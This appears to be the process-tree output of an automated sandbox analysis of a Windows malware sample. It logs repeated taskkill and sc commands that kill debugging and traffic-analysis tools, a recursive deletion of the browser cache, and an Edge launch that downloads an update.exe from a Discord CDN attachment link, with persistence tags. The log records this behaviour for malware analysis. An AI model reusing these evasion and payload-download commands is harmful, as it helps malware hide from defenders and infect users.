- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\update.exe" MD5 | find /i /v "md5" | find /i /v "certutil"2⤵
-
C:\Windows\system32\certutil.execertutil -hashfile "C:\Users\Admin\AppData\Local\Temp\update.exe" MD53⤵
- Loads dropped DLL
-
C:\Windows\system32\find.exefind /i /v "md5"3⤵
-
C:\Windows\system32\find.exefind /i /v "certutil"3⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&12⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /IM HTTPDebuggerSvc.exe /F >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /IM HTTPDebuggerSvc.exe /F3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c @RD /S /Q "C:\Users\%username%\AppData\Local\Microsoft\Windows\INetCache\IE" >nul 2>&12⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq wireshark*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/920160935023362120/1016575229683834940/update.exe2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0x108,0x7ffbeb9746f8,0x7ffbeb974708,0x7ffbeb9747183⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:23⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2652 /prefetch:33⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3132 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3768 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3780 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5144 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5472 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5400 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6196 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings3⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ff752565460,0x7ff752565470,0x7ff7525654804⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6196 /prefetch:83⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,3408816483182448982,2285016155848296037,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2608 /prefetch:83⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Loads dropped DLL
- Adds Run key to start application
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbeb9746f8,0x7ffbeb974708,0x7ffbeb9747182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:32⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3456 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4356 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5392 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5692 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5532 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2128,2147534626669730094,14030673569624298111,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5788 /prefetch:82⤵
-
